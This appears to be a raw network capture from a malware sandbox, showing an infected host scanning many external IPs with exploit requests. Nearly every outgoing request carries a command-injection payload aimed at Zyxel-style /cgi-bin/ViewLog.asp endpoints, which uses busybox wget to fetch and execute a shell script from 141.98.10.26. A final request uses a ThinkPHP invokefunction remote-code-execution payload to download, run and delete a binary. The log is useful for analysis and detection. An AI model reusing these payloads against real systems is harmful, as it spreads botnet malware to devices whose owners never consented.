Nov 22, 2023 08:38:59.193928003 CET	8446	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
446	192.168.2.23	57268	94.120.254.154	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.197838068 CET	8447	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
447	192.168.2.23	57470	95.86.164.47	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.233275890 CET	8448	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.501225948 CET	8549	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 11:31:36 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Nov 22, 2023 08:39:00.851464033 CET	8677	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 11:31:36 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Nov 22, 2023 08:39:02.469938993 CET	8844	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 11:31:36 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Nov 22, 2023 08:39:05.716630936 CET	9282	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 11:31:36 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Nov 22, 2023 08:39:12.210211039 CET	9994	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 11:31:36 GMT Server: DNVRS-Webs Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
448	192.168.2.23	47002	31.25.65.6	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.332133055 CET	8545	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:00.298079967 CET	8604	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
449	192.168.2.23	55634	85.105.104.117	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.432104111 CET	8547	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:59.663072109 CET	8554	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
450	192.168.2.23	43238	31.136.155.252	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.836585999 CET	8556	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:00.394085884 CET	8667	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.513879061 CET	8739	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:03.945565939 CET	9040	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:08.552887917 CET	9625	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:17.511795998 CET	10645	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:36.197053909 CET	12887	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:13.055828094 CET	17347	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
451	192.168.2.23	34336	85.75.228.70	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:59.891700029 CET	8557	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:00.142821074 CET	8580	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 22 Nov 2023 07:38:59 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
452	192.168.2.23	40250	95.216.201.11	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:00.173346996 CET	8581	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:00.369188070 CET	8605	IN	HTTP/1.1 404 Not Found Connection: keep-alive Date: Wed, 22 Nov 2023 07:38:59 GMT Content-Length: 10 Server: Flussonic Data Raw: 4e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: Not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
453	192.168.2.23	45548	62.38.130.52	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:00.378144979 CET	8666	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
454	192.168.2.23	59756	31.135.155.20	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:00.840712070 CET	8675	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.057333946 CET	8689	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
455	192.168.2.23	53718	94.24.106.30	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:00.843280077 CET	8676	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:01.590451002 CET	8799	IN	HTTP/1.1 500 Internal Server Error

Session ID	Source IP	Source Port	Destination IP	Destination Port
456	192.168.2.23	48448	31.200.36.187	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:00.851599932 CET	8677	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
457	192.168.2.23	43370	112.126.173.128	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:01.453138113 CET	8737	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:01.771738052 CET	8803	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:20 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 